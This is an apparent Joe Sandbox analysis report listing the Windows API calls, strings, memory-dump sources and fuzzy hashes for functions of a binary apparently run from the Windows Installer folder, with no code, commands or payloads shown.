                                                                                          • DecodePointer.KERNEL32(00642898,00000314,00000000), ref: 005FAE28
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Pointer$Encode$AddressDecodeProc$LibraryLoad
                                                                                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                          • API String ID: 1951731885-564504941
                                                                                          • Opcode ID: 06d80053ee1a980ad0749ac0cd2a4236ed5051e8688ceff41d6950f8d60bfc20
                                                                                          • Instruction ID: 751b5a306db2a2a1dbc3265105730b2b7166ed7d430be0c50a37ea44d1a54e7a
                                                                                          • Opcode Fuzzy Hash: 06d80053ee1a980ad0749ac0cd2a4236ed5051e8688ceff41d6950f8d60bfc20
                                                                                          • Instruction Fuzzy Hash: 614120B5D0031EAACB10AFB59C85AAF7FEEBB48341B555515E608E2250DB78D900CF62
                                                                                          Function 005DD0F0 Relevance: 37.1, APIs: 12, Strings: 9, Instructions: 331libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(psapi.dll,DE64E134,?,?,?,?,0061747B,000000FF), ref: 005DD130
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 005DD1CB
                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 005DD249
                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 005DD274
                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 005DD2F0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoadOpenProcess
                                                                                          • String ID: %s has %s$.dll$.exe$C:\Windows\Installer\$EnumProcessModules$EnumProcesses$GetModuleFileNameExW$psapi.dll$shfolder.dll
                                                                                          • API String ID: 2120802357-3786208033
                                                                                          • Opcode ID: abeb5ca0022a5120fd61910c056377f7e5a5f447529a1c0087c384c0992b34f5
                                                                                          • Instruction ID: 9317b7a3e90867299014aea102bafd988cebbd42a19e0c5f95bc865300116ea7
                                                                                          • Opcode Fuzzy Hash: abeb5ca0022a5120fd61910c056377f7e5a5f447529a1c0087c384c0992b34f5
                                                                                          • Instruction Fuzzy Hash: 50C184719402159FDB30DF69CC85BDA7BB9BF48314F0485ABE589A7240DB70AE81CFA1
                                                                                          Function 005E2140 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 238memorylibraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005E1540: LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 005E158E
                                                                                            • Part of subcall function 005E1540: GetLastError.KERNEL32 ref: 005E1598
                                                                                          • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 005E2247
                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005E22B7
                                                                                          • GetLastError.KERNEL32 ref: 005E22C1
                                                                                          • GetLengthSid.ADVAPI32(?), ref: 005E22E4
                                                                                          • GetLengthSid.ADVAPI32(?), ref: 005E22F6
                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 005E230A
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 005E2311
                                                                                          • InitializeAcl.ADVAPI32(00000000,?,00000002), ref: 005E231D
                                                                                          • GetLastError.KERNEL32 ref: 005E2327
                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 005E2369
                                                                                          • AddAce.ADVAPI32(00000000,00000002,000000FF,00000000,?), ref: 005E2393
                                                                                          • AddAuditAccessAce.ADVAPI32(00000000,00000002,?,?,?,?), ref: 005E23B8
                                                                                          • GetLastError.KERNEL32(?,00000002,?,?,?,?,?,00000002,000000FF,00000000,?), ref: 005E23C2
                                                                                          • LocalFree.KERNEL32(?,?,?,00000001), ref: 005E2435
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001), ref: 005E2442
                                                                                          • HeapFree.KERNEL32(00000000), ref: 005E2449
                                                                                            • Part of subcall function 005E15D0: GetCurrentProcess.KERNEL32(00000028,?), ref: 005E1600
                                                                                            • Part of subcall function 005E15D0: OpenProcessToken.ADVAPI32(00000000), ref: 005E1607
                                                                                            • Part of subcall function 005E15D0: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 005E161B
                                                                                            • Part of subcall function 005E15D0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005E1647
                                                                                            • Part of subcall function 005E15D0: GetLastError.KERNEL32 ref: 005E1651
                                                                                            • Part of subcall function 005E15D0: CloseHandle.KERNEL32(?), ref: 005E165D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$HeapProcess$FreeLengthLookupToken$AccessAccountAddressAdjustAllocAuditCloseCurrentHandleInformationInitializeLocalNameOpenPrivilegePrivilegesProcValue
                                                                                          • String ID: GetNamedSecurityInfoW$SetNamedSecurityInfoW$W
                                                                                          • API String ID: 2850586162-1988343955
                                                                                          • Opcode ID: 5e09c7994f361bdce0580ebe98c7fa42de3b3fdbeeafc59680fc81c938661fcd
                                                                                          • Instruction ID: df7a76a5ef151740d4c5417b6280a6e34878a9d240b1b70a0ab4deff1269d71b
                                                                                          • Opcode Fuzzy Hash: 5e09c7994f361bdce0580ebe98c7fa42de3b3fdbeeafc59680fc81c938661fcd
                                                                                          • Instruction Fuzzy Hash: B79178B1A002599BDB24CF65DC45BD9BBB9FF58701F048199E649E7180E7749E80CFA0
                                                                                          Function 005AEDF0 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 85libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(setupapi,005DCD69), ref: 005AEDF5
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiDestroyDeviceInfoList), ref: 005AEE22
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceRegistryPropertyW), ref: 005AEE34
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInfo), ref: 005AEE47
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsW), ref: 005AEE5A
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiDeleteDeviceInfo), ref: 005AEE6C
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiCallClassInstaller), ref: 005AEE7F
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiSetDeviceRegistryPropertyW), ref: 005AEE92
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiCreateDeviceInfoW), ref: 005AEEA4
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiCreateDeviceInfoList), ref: 005AEEB7
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          Strings
                                                                                          • SetupDiEnumDeviceInfo, xrefs: 005AEE3C
                                                                                          • setupapi, xrefs: 005AEDF0
                                                                                          • SetupDiCreateDeviceInfoW, xrefs: 005AEE9E
                                                                                          • SetupDiCreateDeviceInfoList, xrefs: 005AEEAC
                                                                                          • SetupDiGetClassDevsW, xrefs: 005AEE4F
                                                                                          • SetupDiSetDeviceRegistryPropertyW, xrefs: 005AEE87
                                                                                          • SetupDiCallClassInstaller, xrefs: 005AEE74
                                                                                          • SetupDiGetDeviceRegistryPropertyW, xrefs: 005AEE2E
                                                                                          • SetupDiDeleteDeviceInfo, xrefs: 005AEE66
                                                                                          • SetupDiDestroyDeviceInfoList, xrefs: 005AEE1C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Load$LibraryStringwvsprintf
                                                                                          • String ID: SetupDiCallClassInstaller$SetupDiCreateDeviceInfoList$SetupDiCreateDeviceInfoW$SetupDiDeleteDeviceInfo$SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInfo$SetupDiGetClassDevsW$SetupDiGetDeviceRegistryPropertyW$SetupDiSetDeviceRegistryPropertyW$setupapi
                                                                                          • API String ID: 3735228727-3886225236
                                                                                          • Opcode ID: 3e7506188d689fb1cee5cd9eafc4390513ea31f29b70dfcb019f16c8f968974a
                                                                                          • Instruction ID: 8da214898d7e0d9cdc3bd176b0a5af1a00eb14c49f929a47c1813e366cd979f0
                                                                                          • Opcode Fuzzy Hash: 3e7506188d689fb1cee5cd9eafc4390513ea31f29b70dfcb019f16c8f968974a
                                                                                          • Instruction Fuzzy Hash: 8E310CB0910628AFDF10DF79AC0BB563FEAFB5A705F04712AB300821A2D7B45480CF91
                                                                                          Function 005B0628 Relevance: 33.6, APIs: 10, Strings: 9, Instructions: 366COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 005B0725
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PathTemp
                                                                                          • String ID: Call Stack:%s$Details in file:$...(more)$Callstack:$ $%04d-%02d-%02d %02d:%02d:%02d.%03d, Win%s %d.%d$NOT copied to disk$Support\$copied to %s
                                                                                          • API String ID: 2920410445-1214151659
                                                                                          • Opcode ID: 02c713ee54158a3be2504f0f58d02b65d67b6f1e8b60043bd6a222896e5e54b8
                                                                                          • Instruction ID: a40b6a94c0fba38908c5f843208e2c789f1026ea732f6ed6b11c417daa8081cd
                                                                                          • Opcode Fuzzy Hash: 02c713ee54158a3be2504f0f58d02b65d67b6f1e8b60043bd6a222896e5e54b8
                                                                                          • Instruction Fuzzy Hash: 91D107719002199BCB24DF64CD55BEB77B9FF94700F088595EA0AA72C1FB70AE84CB90
                                                                                          Function 005F2D4E Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,005ED3F0), ref: 005F2D56
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005F2D78
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005F2D85
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005F2D92
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005F2D9F
                                                                                          • TlsAlloc.KERNEL32(?,005ED3F0), ref: 005F2DEF
                                                                                          • TlsSetValue.KERNEL32(00000000,?,005ED3F0), ref: 005F2E0A
                                                                                          • EncodePointer.KERNEL32(?,005ED3F0), ref: 005F2E25
                                                                                          • EncodePointer.KERNEL32(?,005ED3F0), ref: 005F2E32
                                                                                          • EncodePointer.KERNEL32(?,005ED3F0), ref: 005F2E3F
                                                                                          • EncodePointer.KERNEL32(?,005ED3F0), ref: 005F2E4C
                                                                                          • DecodePointer.KERNEL32(Function_00062BA5,?,005ED3F0), ref: 005F2E6D
                                                                                          • DecodePointer.KERNEL32(00000000,?,005ED3F0), ref: 005F2E9C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2EAE
                                                                                            • Part of subcall function 005F2A21: DecodePointer.KERNEL32(00000006,005F2EC4,?,005ED3F0), ref: 005F2A32
                                                                                            • Part of subcall function 005F2A21: TlsFree.KERNEL32(00000016,005F2EC4,?,005ED3F0), ref: 005F2A4C
                                                                                            • Part of subcall function 005F2A21: DeleteCriticalSection.KERNEL32(00000000,00000000,77485730,?,005F2EC4,?,005ED3F0), ref: 005F91BF
                                                                                            • Part of subcall function 005F2A21: DeleteCriticalSection.KERNEL32(00000016,77485730,?,005F2EC4,?,005ED3F0), ref: 005F91E9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                          • API String ID: 4111557884-3819984048
                                                                                          • Opcode ID: acb3fbaa6b7f46b8cc8eee7c8a235a6858c619281cc5497bddc8f78d2ed3472c
                                                                                          • Instruction ID: 96aaf4d6784cc05182b3e9ea906a84990d6acca7cda683fe15d4a3ca5374378d
                                                                                          • Opcode Fuzzy Hash: acb3fbaa6b7f46b8cc8eee7c8a235a6858c619281cc5497bddc8f78d2ed3472c
                                                                                          • Instruction Fuzzy Hash: 39318F75A01736AFC711AF75AC099673FA6FB82360F146116E514D33B4DBB88641CF60
                                                                                          Function 005BE090 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 289windowlibraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000080), ref: 005BE0D7
                                                                                          • EnumChildWindows.USER32(?,Function_0002DF40,?), ref: 005BE229
                                                                                          • GetClassNameW.USER32(?,?,00000040), ref: 005BE33B
                                                                                          • GetWindowRect.USER32(?,?), ref: 005BE3D6
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 005BE44A
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?), ref: 005BE45D
                                                                                          • LoadLibraryW.KERNEL32(psapi.dll), ref: 005BE472
                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 005BE4B1
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BE4D5
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005BE4DC
                                                                                          • FreeLibrary.KERNEL32(?), ref: 005BE4ED
                                                                                          • PostMessageW.USER32(?,00000200,00000000,00050005), ref: 005BE505
                                                                                          • PostMessageW.USER32(?,00000201,00000000,00050005), ref: 005BE513
                                                                                          • PostMessageW.USER32(?,00000202,00000000,00050005), ref: 005BE521
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePost$ClassLibraryNameProcessWindow$AddressChildCloseEnumErrorFreeHandleLastLoadOpenProcRectThreadWindows
                                                                                          • String ID: #32770$Button$GetModuleFileNameExW$psapi.dll
                                                                                          • API String ID: 1040800019-2766096174
                                                                                          • Opcode ID: b44b4fcc193c45a55b1c9611af4bda5ecfdd8b9af733b9840d822733b63e3730
                                                                                          • Instruction ID: b423a11fc05aaee6d42c7d2cdcf421f7fe544ff65744c60e6191894974aa74c6
                                                                                          • Opcode Fuzzy Hash: b44b4fcc193c45a55b1c9611af4bda5ecfdd8b9af733b9840d822733b63e3730
                                                                                          • Instruction Fuzzy Hash: 94C1E6B0D506299BDB318F14CC86BEEBAB9BB58B15F5485DAE109A3240D7706EC0CF91
                                                                                          Function 005CC9D0 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 220libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(netapi32.dll), ref: 005CCA05
                                                                                          • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 005CCA36
                                                                                          • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 005CCA44
                                                                                          • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 005CCA52
                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 005CCAA3
                                                                                          • GetTickCount.KERNEL32 ref: 005CCB10
                                                                                          • GetTickCount.KERNEL32 ref: 005CCB33
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                          • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                          • API String ID: 132346978-2450594007
                                                                                          • Opcode ID: b9a09a5dddfb9558db42cc2c4eee811768c6c0f4c662adbc0a5cb0183e3303b7
                                                                                          • Instruction ID: 58cc9e200c91d93b3fefd12ac24ab6ab9265e2c9cc214d39fbd42e3f6a0f66cb
                                                                                          • Opcode Fuzzy Hash: b9a09a5dddfb9558db42cc2c4eee811768c6c0f4c662adbc0a5cb0183e3303b7
                                                                                          • Instruction Fuzzy Hash: 4F812B71A002289FDB20DBA8CCA5BEABBB5FF49310F0541D9E94EA7241D7745E80CF91
                                                                                          Function 005B82C0 Relevance: 30.4, APIs: 20, Instructions: 364COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B82EE
                                                                                            • Part of subcall function 005B6BB0: GetDC.USER32(00000000), ref: 005B6BB7
                                                                                          • GetSysColor.USER32(00000010), ref: 005B831C
                                                                                          • DeleteObject.GDI32(00000000), ref: 005B835D
                                                                                          • GlobalLock.KERNEL32(?), ref: 005B836D
                                                                                          • GlobalLock.KERNEL32(?), ref: 005B8376
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B8431
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B843A
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B8440
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B8446
                                                                                            • Part of subcall function 005C2410: GetObjectW.GDI32(?,00000018,?), ref: 005C2423
                                                                                            • Part of subcall function 005C2410: CreateCompatibleDC.GDI32(00000000), ref: 005C2431
                                                                                            • Part of subcall function 005C2410: CreateCompatibleDC.GDI32(00000000), ref: 005C2436
                                                                                            • Part of subcall function 005C2410: SelectObject.GDI32(00000000,00000000), ref: 005C244E
                                                                                            • Part of subcall function 005C2410: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 005C2461
                                                                                            • Part of subcall function 005C2410: SelectObject.GDI32(00000000,00000000), ref: 005C246C
                                                                                            • Part of subcall function 005C2410: SetBkColor.GDI32(00000000,00000000), ref: 005C2476
                                                                                            • Part of subcall function 005C2410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 005C2493
                                                                                            • Part of subcall function 005C2410: SetBkColor.GDI32(00000000,00000000), ref: 005C249C
                                                                                            • Part of subcall function 005C2410: SetTextColor.GDI32(00000000,00FFFFFF), ref: 005C24A8
                                                                                            • Part of subcall function 005C2410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 005C24C5
                                                                                            • Part of subcall function 005C2410: SetBkColor.GDI32(00000000,005B700B), ref: 005C24D0
                                                                                            • Part of subcall function 005C2410: SetTextColor.GDI32(00000000,00000000), ref: 005C24D9
                                                                                            • Part of subcall function 005C2410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 005C24F6
                                                                                            • Part of subcall function 005C2410: SelectObject.GDI32(00000000,00000000), ref: 005C2501
                                                                                          • DeleteObject.GDI32(?), ref: 005B8467
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$ColorGlobal$CreateSelect$CompatibleDeleteFreeLockTextUnlock$Bitmap
                                                                                          • String ID:
                                                                                          • API String ID: 1927380411-0
                                                                                          • Opcode ID: 028a52357680f6e799abae00200fb8892cdf7656e2b919f1911146b1e87cbe58
                                                                                          • Instruction ID: af34ac89d1742d3518f1001e60786e3c978ca865305b5ccc73ea19b588f4a2d6
                                                                                          • Opcode Fuzzy Hash: 028a52357680f6e799abae00200fb8892cdf7656e2b919f1911146b1e87cbe58
                                                                                          • Instruction Fuzzy Hash: 2CE19071D04259AFCF14CFA8D8949EEBFB9BF99300F189599E854A7341DB34AD01CBA0
                                                                                          Function 005C2410 Relevance: 30.1, APIs: 20, Instructions: 121windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005C2423
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005C2431
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005C2436
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005C244E
                                                                                          • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 005C2461
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005C246C
                                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 005C2476
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 005C2493
                                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 005C249C
                                                                                          • SetTextColor.GDI32(00000000,00FFFFFF), ref: 005C24A8
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 005C24C5
                                                                                          • SetBkColor.GDI32(00000000,005B700B), ref: 005C24D0
                                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 005C24D9
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 005C24F6
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005C2501
